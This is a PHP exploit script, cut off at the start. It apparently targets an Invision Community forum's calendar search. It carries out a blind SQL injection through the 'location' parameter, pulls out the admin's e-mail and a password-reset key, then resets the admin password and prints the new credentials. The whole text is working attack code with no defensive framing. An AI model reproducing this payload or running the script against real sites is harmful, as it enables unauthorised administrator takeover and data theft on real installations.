\n\n"); $url = $argv[1]; $ch = curl_init(); @unlink("./cookies.txt"); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt"); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); $params = ["app" => "calendar", "module" => "calendar", "controller" => "view", "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]]; function sql_injection($sql) { global $ch, $params; $min = true; $idx = 1; while (1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? $test - pow(2, $i) : $test + pow(2, $i); $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#"; curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); $min = preg_match("/elErrorMessage/", curl_exec($ch)); } if (($chr = $min ? $test - 1 : $test) == 0) break; $data .= chr($chr); $min = true; $idx++; print "\r[*] Data: {$data}"; } return $data; } print "[+] Step 1: fetching admin's e-mail address\n"; $email = sql_injection("SELECT email FROM core_members WHERE member_id=1"); print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter."; fgets(STDIN); print "[+] Step 3: fetching the password reset key\n"; $vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1"); print "\n[+] Step 4: taking over the admin account by resetting their password\n"; curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/"); $passwd = md5(time()); $params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}"; curl_setopt($ch, CURLOPT_POSTFIELDS, $params); if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n"); print "[+] Pwned! You can now login with {$email}:{$passwd}\n";